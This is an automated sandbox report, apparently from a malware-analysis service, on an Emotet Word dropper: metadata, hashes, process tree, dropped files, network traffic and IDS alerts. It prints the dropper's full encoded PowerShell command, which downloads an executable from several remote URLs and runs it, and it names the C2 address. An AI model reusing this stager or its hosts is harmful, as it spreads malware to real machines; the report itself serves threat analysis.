File name: | DOC 7710 97322832.doc |
Full analysis: | https://app.any.run/tasks/ef747279-5d48-4c55-b361-87e2458fd1ad |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 14, 2019, 21:24:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: integrate Soft, Subject: Checking Account, Author: Laurine Beer, Comments: navigate Rustic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 17:10:00 2019, Last Saved Time/Date: Tue May 14 17:10:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0 |
MD5: | BA068FE1B4BFC6ABC34415A610D21CE8 |
SHA1: | 1F689CC546A24F78BE29422980FF2BDC761458BE |
SHA256: | 9D9A146BFCE8BC42F3835E6C4025535D816924734F3DFB41B189893DA33C1CF7 |
SSDEEP: | 3072:v77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q47PfIiOmic9eSx/NgP9:v77HUUUUUUUUUUUUUUUUUUUT52VVDXO7 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Daugherty |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 196 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Keebler Inc |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 168 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:05:14 16:10:00 |
CreateDate: | 2019:05:14 16:10:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | navigate Rustic |
Keywords: | - |
Author: | Laurine Beer |
Subject: | Checking Account |
Title: | integrate Soft |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC 7710 97322832.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3392 | powershell -enc JAByADQANwAyADMANwA4AD0AJwBNADcANgAwADUANQA2ADIAJwA7ACQAcwA4ADkAOAA0ADQAMQA5ACAAPQAgACcAMgAzADUAJwA7ACQAcwA2ADUAOAA3ADQAMQA2AD0AJwBEADAAOAAyADMAMQAnADsAJAB0ADYAMgA4ADYAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcwA4ADkAOAA0ADQAMQA5ACsAJwAuAGUAeABlACcAOwAkAE8ANgAxADcAMgAxADIANAA9ACcAUQA5ADMAMAA3ADMANgAnADsAJABUADMANAA1ADYAOAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAYABCAGMATABgAGkAYABFAE4AVAA7ACQAbQA0ADcANAA3ADgANQA2AD0AJwBoAHQAdABwADoALwAvAHIAaQB2AGUAcgBzAG8AZgB0AGIAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYARgBpAGsAYQBRAGoAWQBnAC8AQABoAHQAdABwADoALwAvAGQAYQB5AGkAbwBnAGwAdQB1AG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEQAaABNAG8AeABQAHIAdwBDAC8AQABoAHQAdABwADoALwAvAHQAaABlAHIAYQB0AHQAZwBhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbwBzADQAdQA2AGgAXwBwAHQAOAB3AGQAYgAtADMALwBAAGgAdAB0AHAAOgAvAC8AYgBlAHkAYQB6AGcAYQByAGEAZwBlAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATgB1AHkAZwBpAE0ARgBvAFIAQwAvAEAAaAB0AHQAcAA6AC8ALwBrAHMAYQBmAGUAdAB5AC4AaQB0AC8AYQB3AHMAdABhAHQAcwAtAGkAYwBvAG4ALwBiAGgAcgBkAGQANQBfADUAMgBoAHEAOAA5AC0AMwA0AC8AJwAuAHMAUABMAGkAdAAoACcAQAAnACkAOwAkAHIANgAwADcAMwAzADkAMgA9ACcAbAAyADQAXwA0AF8AOAAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAF8ANQAyADgAMAA2ADIAIABpAG4AIAAkAG0ANAA3ADQANwA4ADUANgApAHsAdAByAHkAewAkAFQAMwA0ADUANgA4AC4AZABvAHcAbgBsAE8AYQBEAEYASQBsAEUAKAAkAEkAXwA1ADIAOAAwADYAMgAsACAAJAB0ADYAMgA4ADYAMQApADsAJABWADcAMwA2ADgAMgAwAD0AJwBOADYANwBfADIAOAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxACkALgBsAEUATgBHAHQAaAAgAC0AZwBlACAAMgA2ADAAOQA0ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawAnACsAJwBlAC0ASQB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxADsAJABuADQANAAwADUANwAxADMAPQAnAHYAMAAwADQAMwBfADUAMwAnADsAYgByAGUAYQBrADsAJAB3ADIANQBfAF8ANQA0AD0AJwBKADMAMQA2ADkAMgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABkADMAOAA1ADUAMgAxAF8APQAnAEkANQBfADgANgAxADEAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
644 | "C:\Users\admin\235.exe" | C:\Users\admin\235.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3544 | --ebe2cb72 | C:\Users\admin\235.exe | 235.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2552 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 235.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2384 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED1C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U427VIIQF9G27UYD7IQB.temp | — | |
MD5:— | SHA256:— | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F964D4F7.wmf | wmf | |
MD5:7E4D76AE77275FD9026D0A420165C56E | SHA256:E426AF68C1E8A388334D08D04E24759CF65B8EDCC4BB60D262A519B98523DA22 | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C 7710 97322832.doc | pgc | |
MD5:547064AFCF54A197CF37025F75AA91EA | SHA256:A8F916B305B787E3168D8C950821A646DCD879C14937F5EA35D14DFDF216B993 | |||
3392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fcfb.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F483AB4.wmf | wmf | |
MD5:A2C801A80BAF00195780910F6493D4A5 | SHA256:9701BB94D3E60AB9C1C387CA8EF2C65D7F97D76B47A319CAF00882610779DB61 | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14E5A841.wmf | wmf | |
MD5:9EB36D08C34925819CC91CC6D628168F | SHA256:623A76D42AC6BCF5EED1506D1295D9AD8547516D26E31DBAA4DAE11654DEF215 | |||
3392 | powershell.exe | C:\Users\admin\235.exe | executable | |
MD5:4F755FEF4A94EECBFCE7AB4FC5D70391 | SHA256:71DD8C35448FA4D479A2A4AB4582FE7B95E9BE7517BC5D049D10BB79B26A45EA | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF0C714E.wmf | wmf | |
MD5:319F9878ABB5E081DD7AB5D6A6FF4015 | SHA256:6AB9569F6FCD2FF6B2AF529BA80048DB15DC519CD467C0C641C074796404443D | |||
3332 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19A2B325.wmf | wmf | |
MD5:CA0B44577CDD0C42234EEFEDDCEE18D4 | SHA256:C761177B308670DE41666810914B1CF426D93C60889B456A1B3F21FDCCC1646F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3392 | powershell.exe | GET | — | 99.198.101.186:80 | http://riversoftbd.com/wp-content/vFikaQjYg/ | US | — | — | suspicious |
2384 | soundser.exe | POST | — | 200.85.46.122:80 | http://200.85.46.122/teapot/img/ringin/merge/ | PY | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2384 | soundser.exe | 200.85.46.122:80 | — | Telecel S.A. | PY | malicious |
3392 | powershell.exe | 99.198.101.186:80 | riversoftbd.com | SingleHop, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
riversoftbd.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3392 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3392 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3392 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2384 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |